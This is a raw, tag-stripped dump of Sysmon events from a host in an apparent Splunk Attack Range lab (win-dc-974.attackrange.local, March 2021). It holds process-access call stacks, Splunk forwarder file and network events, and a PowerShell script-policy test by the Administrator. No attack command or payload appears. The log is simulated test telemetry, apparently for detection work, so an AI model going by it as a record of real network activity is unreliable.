16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.122{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002234825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:28.574{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C97202ED9CFFEC9D59E9DA4F04857A6,SHA256=241346A6E7B80A9FD7426AF8904E33FDFA9CBCF4BE5EF861A8D74805597B6C47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:28.277{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E071EAA1BA9F810B8444E9520EDB0FFA,SHA256=7CFEF6BF1823EAFDF44E1C81E22B0F9DF25E34A739540E3693423B81694A890C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:17.261{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58743- 23542300x80000000000000002234829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:29.965{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=755BFA1D16E25FCA7FCFE8F1EFC2FE2E,SHA256=51205F6C8D7E7B04A40B8A6C2365859677F7F326053EDBC66A36990B68D4432B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:29.605{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6BCCF96598D1B58A30D3209E3C7EA01,SHA256=89C1A6170D81C9198E45E31F6D1BBA54D8A5D77ED5A96D5ABF3FCE432AD0B6E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:18.402{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60108-false10.0.1.12-8000- 354300x80000000000000002234826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:18.276{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local58743- 23542300x80000000000000002234830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:30.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C3CD3ED9E00E6DF6BE8366085FF7E3,SHA256=61AA662C599703A3CDA1F5ABEAB726EE10D00E7C0C65B120B64007A175BAF97B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:31.652{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47C20063B3F790ECD8FE2C92AE4E90AE,SHA256=5419F7537339B4E21A34158F01E860D230EC7FB9995AC0EC729B3A99220BC0D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:31.168{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10C371D27E1BEEB556B63ED9697D5F01,SHA256=E9A48125BEE13A841B3BF9FE801F839CDA483F9DCB27798CEDB4C5D376141263,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:31.074{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8724DB7FE02579CC30413198C4A3107F,SHA256=5043682D1ECD186019A437A7DABB097D405C18C690C0B99D698F8451D31BA60E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:32.980{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51720787370D63AEB571F71204041358,SHA256=4A761496FA455B839AB79E46541640270BC5EF7EA7589CE2BF861F432C7D83CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:32.668{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1700DD15F19465D8657C4D60722E4F0,SHA256=83EC34EA3CA312FC998882725CE0BA644A74B96A06467B776633F4C5A747F622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:33.684{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0952FFFC67C4CF37B2C632956BF25DC,SHA256=A001579948B597894E89EF1D02B89DD4EE38026BBEE719C1D5E353F77F15CC10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:34.684{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58717C1340CE336CB976533C5DA6AE15,SHA256=75E3D7F8058A36DB7B3B60525B0099594037A992889A6B039210EACCD81CFF04,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:23.402{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60109-false10.0.1.12-8000- 23542300x80000000000000002234841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:35.965{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E97CE1939C9EC530BA8FB6EA2E3A7178,SHA256=D0DD0A3ABBCCD0D45D3E43F4F69CF3A5AE358F85788F600E15A6F3D56E577126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:35.699{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F2A008C760EC1B45C5CAD30D9331EB9,SHA256=46C40B2ABFB8BFEBF8A20B21E04B407F1AE926ACCAB81F2A8C6F96A4F2A65611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:35.184{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35542B28FD78DA2B03C5CBEDC9621B21,SHA256=677B242E1838581F593DAA6D16F4605D657BE7A02188F01F2DF74982146E455C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:36.718{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C74A5FCBDCD17EF8754F0241B255AF5F,SHA256=7CE1AF861D82987EE375808BA2705EFA1E90D77190558FEB5A33D8C2DE48186C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:36.317{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:37.746{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE28B5F2246E607FB28B824D86F4AA5C,SHA256=6F51D71F2507E6AF62D72D1FD05C14F6F27B1D83F683B3A8731EE950CC60E588,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:37.340{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B528F225BBB2D777A0CCB56B955CCCCD,SHA256=4DC7279109619BB57588C8A2B38CF76E959548DAD1C6A6323767795384F6C63E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:38.762{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA62E31EE0AE434C861AFF9B55BE6822,SHA256=9A681AA44F3FFB03235D021967F0560074B7546647D41111E9CF6F14E4FA052F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:27.464{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60110-false10.0.1.12-8089- 23542300x80000000000000002234850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:39.812{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF41F0B957D41BCF922F3C2E52806E83,SHA256=A8D565863158A3D1E34D230C93AADC94C18B7C7E97B43F61E55B4EDDCFF94E1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002234849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:29.261{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60111-false10.0.1.12-8000- 23542300x80000000000000002234848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:39.137{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD61CD980FBC111F2EF3336BFDBFE4BB,SHA256=94F11249033BF06E117D16A0D45FD802935683980A23B47ADEFF664D0C87893A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:40.840{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56BDC05E2896558A8C33F13AC8932B33,SHA256=F2348FFE51501A102359B249A34B59188CFAF8D6822433B03B5F9B02AB616F78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:40.223{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31F1A76A9F9BFEA247F23C2AB9D01A76,SHA256=7D2D79AF48B45D7F000348E06E92B32ECCE2A6F8C31ABE0E1F3185B821159807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.981{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_sdynwcjo.sh2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.981{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_cyklep2s.djd.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002234916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.965{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_cyklep2s.djd.ps12021-03-02 16:51:41.965 10341000x80000000000000002234915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.949{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.902{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.902{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.902{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.902{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 